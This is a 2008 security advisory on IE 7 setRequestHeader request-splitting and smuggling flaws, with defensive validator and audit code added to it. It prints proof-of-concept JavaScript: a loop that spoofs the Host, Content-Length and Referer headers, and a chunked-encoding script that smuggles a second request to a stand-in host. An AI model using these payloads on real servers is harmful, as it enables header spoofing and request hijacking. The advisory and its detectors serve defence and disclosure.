Microsoft IE 7 setRequestHeader() multiple HTTP request splitting/smuggling vulnerabilities
2008-03-26 15:45
Affected versions:
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2
Description:
BUGTRAQ ID: 28379
Internet Explorer is a very popular web browser released by Microsoft.
IE 7 allows HTTP headers such as Content-Length, Host and Referer to be overwritten through an HTTP request splitting attack, resulting in HTTP header spoofing.
JavaScript similar to the following:
----------------------------------------------
var x = new XMLHttpRequest();
x.open("POST", "/");
// Try every high-bit character (127..254) appended to the header name "Host"
for (f = 127; f < 255; f++) {
  try {
    x.setRequestHeader("Host" + String.fromCharCode(f), "Test");
  } catch (dd) {}
}
x.setRequestHeader("Connection", "keep-alive");
x.onreadystatechange = function () {
  if (x.readyState == 4) {
  }
};
x.send("blah");
----------------------------------------------
This overwrites the following headers:
- Content-Length
  x.setRequestHeader("Content-Length" + String.fromCharCode(201), "0");
  x.setRequestHeader("Content-Length" + String.fromCharCode(233), "0");
  x.setRequestHeader("Content-Length" + String.fromCharCode(240) + String.fromCharCode(213), "0");
- Host
  x.setRequestHeader("Host" + String.fromCharCode(223), "www.microsoft.com");
- Referer
  x.setRequestHeader("Referer" + String.fromCharCode(205) + String.fromCharCode(155), "http://www.referrer.tld");
  x.setRequestHeader("Referer" + String.fromCharCode(237) + String.fromCharCode(155), "http://www.referrer.tld");
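The header names above are not valid HTTP field names at all, which is the check an XHR implementation or proxy has to make before any case folding or normalisation of the name. The validator below is an added example, not code from the advisory; the header set it forbids and the regular expressions are taken from RFC 7230's token and field-value grammar, and it runs the advisory's own header names through the check.

```javascript
// Added example, not code from the advisory: a validator for XMLHttpRequest
// header names and values of the kind the IE 7 bug shows was missing. Per
// RFC 7230 a header name is a "token" (printable ASCII minus separators), so
// "Host" + String.fromCharCode(223) is not a valid name and must be rejected
// before any case folding or normalisation is applied to it.
const TOKEN_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
// Field values: HTAB, SP, visible ASCII and obs-text; no CR, LF or NUL,
// so a value can never terminate the header and start a new line.
const VALUE_RE = /^[\t\x20-\x7E\u0080-\u00FF]*$/;

// Request headers that page script must never be allowed to set. Every
// header the advisory shows being overwritten is in this list.
const FORBIDDEN = new Set([
  "host", "content-length", "transfer-encoding", "connection",
  "proxy-connection", "referer",
]);

// Returns "ok", "invalid-name", "invalid-value" or "forbidden".
// Name validity is checked first, on the raw string, so a name with a
// high-bit suffix is refused instead of being folded onto a real header.
function checkRequestHeader(name, value) {
  if (!TOKEN_RE.test(name)) return "invalid-name";
  if (!VALUE_RE.test(value)) return "invalid-value";
  if (FORBIDDEN.has(name.toLowerCase())) return "forbidden";
  return "ok";
}

// Run the header names from the advisory, plus one legitimate custom
// header, through the validator and return [name, verdict] pairs.
function auditAdvisoryHeaders() {
  const cases = [
    ["Host" + String.fromCharCode(223), "www.microsoft.com"],
    ["Content-Length" + String.fromCharCode(201), "0"],
    ["Referer" + String.fromCharCode(205) + String.fromCharCode(155), "http://www.referrer.tld"],
    ["Transfer-Encoding", "chunked"],
    ["X-Requested-With", "XMLHttpRequest"],
  ];
  return cases.map(([n, v]) => [n, checkRequestHeader(n, v)]);
}
```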
Internet Explorer 7 also allows a Transfer-Encoding: chunked header to be set through setRequestHeader, leading to an HTTP request splitting/smuggling vulnerability.
Assuming the site affected by a reflected cross-site scripting vulnerability is hosted on the same host as the attacker's site, and the user has no proxy configured, then because IE 7 allows
setRequestHeader("Transfer-Encoding","chunked");
the payload of the POST request can be used as a further request to the web server. For example:
-----------------------------------------------------
var x = new XMLHttpRequest();
for (var i = 0; i < 1; i++) {
  x.open("POST", "/");
  x.setRequestHeader("Transfer-Encoding", "chunked");
  x.setRequestHeader("Proxy-Connection", "keep-alive");
  x.setRequestHeader("Connection", "keep-alive");
  x.onreadystatechange = function () {
    if (x.readyState == 4) {
    }
  };
  try {
    // A zero-length chunk terminates the chunked body; what follows is
    // read by the server as the start of a second request on the connection
    x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost: at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n");
  } catch (r) {}
}
-----------------------------------------------------
The request on the wire becomes:
----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLengthOfTheNextRequest
----------------------------------------------------
The web server then keeps the socket open, waiting for the payload of the second request.
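From the server or reverse-proxy side, the request dump above carries two signals that should be rejected: a Content-Length alongside Transfer-Encoding (RFC 7230 section 3.3.3), and bytes left on the connection after the chunked terminator. The audit below is an added example, not part of the advisory; the sample request is constructed from the dump on this page, with the placeholder length replaced by 0.

```javascript
// Added example, not code from the advisory: the two checks a server or
// reverse proxy should run on a request like the one shown above.
function parseRequest(raw) {
  const end = raw.indexOf("\r\n\r\n");
  if (end < 0) throw new Error("incomplete header block");
  const lines = raw.slice(0, end).split("\r\n");
  const headers = new Map();               // lower-cased name -> value
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i < 0) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    headers.set(name, headers.has(name) ? headers.get(name) + ", " + value : value);
  }
  return { requestLine: lines[0], headers, body: raw.slice(end + 4) };
}

// Walk a chunked body and return whatever follows the final "0" chunk and
// its (possibly empty) trailer section; null means the body is truncated.
// Anything non-empty here is a second request riding on the same connection.
function chunkedRemainder(body) {
  let pos = 0;
  for (;;) {
    const lineEnd = body.indexOf("\r\n", pos);
    if (lineEnd < 0) return null;
    const size = parseInt(body.slice(pos, lineEnd).split(";")[0], 16);
    if (Number.isNaN(size)) return null;
    if (size === 0) {
      const trailerEnd = body.indexOf("\r\n\r\n", lineEnd);
      return trailerEnd < 0 ? null : body.slice(trailerEnd + 4);
    }
    pos = lineEnd + 2 + size + 2;          // skip size line, data and CRLF
  }
}

// Returns a list of findings; an empty list means the request looks clean.
function auditRequest(raw) {
  const req = parseRequest(raw);
  const findings = [];
  const te = req.headers.get("transfer-encoding");
  const cl = req.headers.get("content-length");
  if (te && cl) findings.push("Transfer-Encoding and Content-Length both present");
  if (te && /chunked/i.test(te)) {
    const rest = chunkedRemainder(req.body);
    if (rest && rest.length > 0) findings.push("data after chunked terminator: " + rest.split("\r\n")[0]);
  }
  return findings;
}

// Constructed sample, reproduced from the request dump in the advisory.
const SAMPLE = "POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n" +
  "Host: at.tack.er\r\nContent-Length: 67\r\n\r\n0\r\n\r\n" +
  "POST /?Send1 HTTP/1.1\r\nHost: at.tack.er\r\nContent-Length: 0\r\n\r\n";
```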
<* Reference:
Stefano Di Paola (stefano@dipaola.wisec.it)
Links: http://marc.info/?l=webappsec&m=120611364624166&w=2 http://marc.info/?l=webappsec&m=120611380224435&w=2
*>
Recommendation:
Microsoft
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.microsoft.com/windows/ie/default.asp